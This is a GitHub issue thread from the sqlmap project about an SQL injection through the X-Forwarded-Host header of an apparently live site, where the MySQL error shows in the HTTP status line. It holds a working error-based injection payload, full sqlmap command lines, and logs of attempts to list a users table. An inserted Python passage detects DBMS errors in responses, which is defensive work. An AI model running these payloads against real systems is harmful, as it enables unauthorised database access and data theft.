
Specific location error #2536

Closed
ghost opened this issue May 16, 2017 · 11 comments

Comments

@ghost

ghost commented May 16, 2017

The mysql error is in the header name.

Can I make changes so that the header values are handled by sqlmap as well as the page?

LOG:

```
[16:15:58] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'X-Forwarded-Host #1*' might not be injectable
[16:15:58] [PAYLOAD] 'gSjgHl<'">GunUja
[16:15:58] [TRAFFIC OUT] HTTP request [#5]:
GET / HTTP/1.1
Accept: /
Host: site.com:443
Accept-encoding: gzip,deflate
X-forwarded-host: 'gSjgHl<'">GunUja
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Cookie: 5fd55f8c1289a9f2dd7accf74deb8350=b0e2dea0463595a6877feedb63e6a341
Connection: close

[16:15:58] [TRAFFIC IN] HTTP response [#5] (500 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">' at line 2 SQL=select user_id,type
from #__domains where domain_name='http://'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl&lt;'&quot;&gt;gunuja' or domain_name=''gsjghl<'">gunuja' or domain_name='www.'gsjghl<'">gunuja' or domain_name='http://'gsjghl<'"&gt
;gunuja/' or domain_name='http://www.'gsjghl&lt;'&quot;&gt;gunuja/' or domain_name=''gsjghl<'">gunuja/' or domain_name='www.'gsjghl<'">gunuja/' ;):
Content-length: 185
X-powered-by: PHP/5.4.45-0+deb7u3
Content-encoding: gzip
Vary: Accept-Encoding
Uri: https://site.com:443/
Server: nginx/1.10.1
Connection: close
Pragma: no-cache
Cache-control: no-cache
Date: Tue, 16 May 2017 16:21:46 GMT
P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html
[16:15:58] [DEBUG] got HTTP error code: 500 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl<'">' at line 2 SQL=select user_id,type
from #__domains where domain_name='http://'gsjghl<'">gunuja' or domain_name='http://www.'gsjghl&lt;'&quot;&gt;gunuja' or domain_name=''gsjghl<'">gunuja' or domain_name='www.'gsjghl<'">gunuja' or domain_name='http://'gsjghl<'"&gt
;gunuja/' or domain_name='http://www.'gsjghl&lt;'&quot;&gt;gunuja/' or domain_name=''gsjghl<'">gunuja/' or domain_name='www.'gsjghl<'">gunuja/' ;)
```

@stamparm
Member

sqlmap already does it. Two things. 1) Always use valid values when you are doing SQLi (e.g. in your case you could use `X-forwarded-host: 127.0.0.1*` and let sqlmap inject there). 2) A DBMS error is not proof of a valid SQL injection. It is just an error.

Please run some proxy in between (e.g. Burp) and inspect requests and responses to find out what is going on.

@stamparm stamparm self-assigned this May 16, 2017
@ghost
Author

ghost commented May 16, 2017

1. Okay
2. This is 100% valid SQL injection!
   But the server returns HTTP code 500 when it detects a MySQL error. The error message itself does not appear on the page. The error message is recorded with the returned header

(three screenshots attached to the original comment)

@stamparm
Member

As I can see, you have something that is totally non-conformant to web standards. The error is returned right after the error code (HTTP/1.1 500...), while any sane web parser (Python's httplib/urllib/urllib2 in this case) will just either ignore that part or nag about a non-standard response.

@ghost
Author

ghost commented May 16, 2017

Yes, it's absolutely not standard! But is it possible to write a tamper for this case?

@stamparm
Member

Correction. Maybe it is not as non-conformant as I first thought. Looking into ways to support it.
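
The response shape under discussion (the DBMS message carried in the status line's reason phrase while the body is a generic page) is easy to miss if a scanner or a log-monitoring rule only inspects the body. The following is an added example, not code from the sqlmap project or from anyone in this thread: it parses a captured response with Python's standard `http.client` parser, which keeps everything after the status code as `resp.reason`, and then scans the reason phrase, the headers and the body separately for a few well-known DBMS error signatures. The sample responses, the `_BytesSocket` shim and the (deliberately short) signature list are all constructed for this example.

```python
"""Detect DBMS error messages that surface in the HTTP status line's reason
phrase rather than in the response body (constructed example, not sqlmap code)."""
import http.client
import io
import re

# A few well-known DBMS error signatures. This is a small subset chosen for the
# example; real scanners and monitoring rules carry far longer lists.
DBMS_ERROR_SIGNATURES = [
    ("MySQL", re.compile(r"You have an error in your SQL syntax", re.I)),
    ("MySQL", re.compile(r"supplied argument is not a valid MySQL", re.I)),
    ("Oracle", re.compile(r"\bORA-\d{5}\b")),
    ("Microsoft SQL Server",
     re.compile(r"Unclosed quotation mark after the character string", re.I)),
    ("PostgreSQL", re.compile(r"PostgreSQL.*?ERROR", re.I | re.S)),
]


class _BytesSocket:
    """Minimal socket stand-in so http.client can parse a captured response."""

    def __init__(self, raw: bytes):
        self._buf = io.BytesIO(raw)

    def makefile(self, mode="rb", *args, **kwargs):
        return self._buf


def parse_response(raw: bytes):
    """Parse a raw response with the standard-library parser.

    http.client keeps everything after the status code as the reason phrase
    (resp.reason), so the DBMS message is recoverable even though neither a
    header nor the body carries it.
    """
    resp = http.client.HTTPResponse(_BytesSocket(raw))
    resp.begin()
    body = resp.read()
    return resp.status, resp.reason, dict(resp.getheaders()), body


def find_dbms_errors(text: str):
    """Return the sorted set of DBMS names whose error signature appears in text."""
    return sorted({dbms for dbms, rx in DBMS_ERROR_SIGNATURES if rx.search(text)})


def scan_body_only(raw: bytes):
    """What a body-only check sees: it misses errors carried in the reason phrase."""
    _, _, _, body = parse_response(raw)
    return find_dbms_errors(body.decode("utf-8", "replace"))


def scan_full(raw: bytes):
    """Check reason phrase, headers and body separately; report hits per location."""
    status, reason, headers, body = parse_response(raw)
    header_text = "\n".join(f"{name}: {value}" for name, value in headers.items())
    return {
        "status": status,
        "reason": find_dbms_errors(reason),
        "headers": find_dbms_errors(header_text),
        "body": find_dbms_errors(body.decode("utf-8", "replace")),
    }


# Constructed sample responses (not captured from any real host).
# 1) Shaped after the issue: MySQL message in the reason phrase, generic body.
SAMPLE_REASON_PHRASE = (
    b"HTTP/1.1 500 You have an error in your SQL syntax; check the manual that "
    b"corresponds to your MySQL server version for the right syntax to use near "
    b"'abc' at line 2 SQL=select user_id,type from #__domains where domain_name='abc'\r\n"
    b"Content-Type: text/html\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"<h1>Server error</h1>"
)
# 2) The usual case: HTTP 200 with the driver warning printed into the page.
SAMPLE_BODY = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"<pre>Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource</pre>"
)
# 3) A clean response for comparison.
SAMPLE_CLEAN = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"<html><body>Welcome</body></html>"
)

if __name__ == "__main__":
    for name, raw in [("reason-phrase", SAMPLE_REASON_PHRASE),
                      ("body", SAMPLE_BODY), ("clean", SAMPLE_CLEAN)]:
        print(name, "body-only:", scan_body_only(raw), "full:", scan_full(raw))
```

For the first sample `scan_body_only` returns nothing while `scan_full` reports the MySQL signature under `"reason"`, which is exactly the blind spot this issue is about; a monitoring rule that alerts on DBMS error text in responses should therefore match on the whole status line, not only on the body.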

@stamparm stamparm reopened this May 16, 2017
@stamparm stamparm added this to the 1.2 milestone May 16, 2017
stamparm added a commit that referenced this issue May 16, 2017
@stamparm
Member

@lordo can you please update and retry?

@ghost
Author

ghost commented May 16, 2017

With this command line

```
python sqlmap.py -r inv.txt -t logmog.txt --technique=E --level 3 --risk 3 --dbms=mysql --suffix="and'"
```

It WORKS!

```
[22:45:16] [INFO] parsing HTTP request from 'inv.txt'
[22:45:16] [INFO] setting file for logging HTTP traffic
custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y
[22:45:18] [INFO] testing connection to the target URL
[22:45:20] [INFO] heuristics detected web page charset 'ascii'
[22:45:20] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'X-Forwarded-Host #1*' might not be injectable
[22:45:21] [INFO] testing for SQL injection on (custom) HEADER parameter 'X-Forwarded-Host #1*'
[22:45:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:45:22] [INFO] (custom) HEADER parameter 'X-Forwarded-Host #1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] y
(custom) HEADER parameter 'X-Forwarded-Host #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 2 HTTP(s) requests:

Parameter: X-Forwarded-Host #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ' AND (SELECT 9003 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9003=9003,1))),0x716b767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)and'

[22:45:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0
[22:45:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times, 502 (Bad Gateway) - 1 times
[22:45:26] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output'

[*] shutting down at 22:45:26
```

@ghost
Author

ghost commented May 16, 2017

But it does not retrieve columns!

```
[*] starting at 22:52:02

[22:52:02] [INFO] parsing HTTP request from 'inv.txt'
[22:52:02] [DEBUG] not a valid WebScarab log data
[22:52:02] [DEBUG] cleaning up configuration parameters
[22:52:02] [INFO] setting file for logging HTTP traffic
[22:52:02] [DEBUG] setting the HTTP timeout
[22:52:02] [DEBUG] creating HTTP requests opener object
[22:52:02] [DEBUG] forcing back-end DBMS to user defined value
[22:52:02] [DEBUG] setting the HTTP Referer header to the target URL
custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y
[22:52:03] [DEBUG] resolving hostname ''
[22:52:03] [INFO] testing connection to the target URL
[22:52:03] [TRAFFIC OUT] HTTP request [#1]:
GET / HTTP/1.1
Host: :443
Accept-encoding: gzip,deflate
X-Forwarded-Host:
Accept: /
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: close

[22:52:04] [DEBUG] declared web page charset 'utf-8'
[22:52:04] [TRAFFIC IN] HTTP response [#1] (200 OK):
Content-length: 8916
X-powered-by: PHP/5.4.45-0+deb7u3
Content-encoding: gzip
Set-cookie: 5fd55f8c1289a9f2dd7accf74deb8350=47f5b75c85ad2c23274a351741d8476f; path=/; HttpOnly
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Vary: Accept-Encoding
Server: nginx/1.10.1
Last-modified: Tue, 16 May 2017 22:57:55 GMT
Connection: close
Pragma: no-cache
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 16 May 2017 22:57:55 GMT
P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html; charset=utf-8
sqlmap resumed the following injection point(s) from stored session:

Parameter: X-Forwarded-Host #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ' AND (SELECT 9003 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9003=9003,1))),0x716b767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)and'
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

[22:52:04] [INFO] testing MySQL
[22:52:04] [DEBUG] performed 0 queries in 0.00 seconds
[22:52:04] [INFO] confirming MySQL
[22:52:04] [DEBUG] performed 0 queries in 0.00 seconds
[22:52:05] [DEBUG] performed 0 queries in 0.00 seconds
[22:52:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0.0
[22:52:05] [INFO] fetching columns for table '#__users' in database 'database'
[22:52:05] [WARNING] unable to retrieve column names for table '#__users' in database 'database'
do you want to use common column existence check? [y/N/q]
```

@stamparm
Member

@lordo I believe that you are limited to certain queries because of header injection. Please use -t traffic.txt or --proxy to find out what is going on

@ghost
Author

ghost commented May 17, 2017

The data is retrieved perfectly! But with columns there is a situation I don't understand. Nothing happens at all: sqlmap doesn't even try to get the columns and immediately writes that it is not possible.

Command line:

```
python sqlmap.py -r inv.txt -t logmog.txt --technique=E --level 3 --risk 3 --dbms=mysql --suffix="and'" -D database -T users --columns
```

The log file contains 1 query in which the vulnerable header (X-Forwarded-Host) is empty! That is, sqlmap did not set anything up, but said that it could not retrieve the columns.

LogFile:

```
HTTP request [#1]:
GET / HTTP/1.1
Host: site.com:443
Referer: https://site.com:443/
Accept-encoding: gzip,deflate
X-Forwarded-Host:
Accept: /
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: close

HTTP response [#1] (200 OK):
Content-length: 8915
X-powered-by: PHP/5.4.45-0+deb7u3
Content-encoding: gzip
Set-cookie: 5fd55f8c1289a9f2dd7accf74deb8350=041fb92635b191320f75dd234ee35d6e; path=/; HttpOnly
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Vary: Accept-Encoding
Uri: https://site.com:443/
Server: nginx/1.10.1
Last-modified: Wed, 17 May 2017 00:20:04 GMT
Connection: close
Pragma: no-cache
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Wed, 17 May 2017 00:20:04 GMT
P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html; charset=utf-8

#HTML SITE#
```

@stamparm
Member

Can you please send a traffic file to miroslav@sqlmap.org which you can get with .... --columns -t traffic.txt? Also, please attach a complete console output together with used command line.
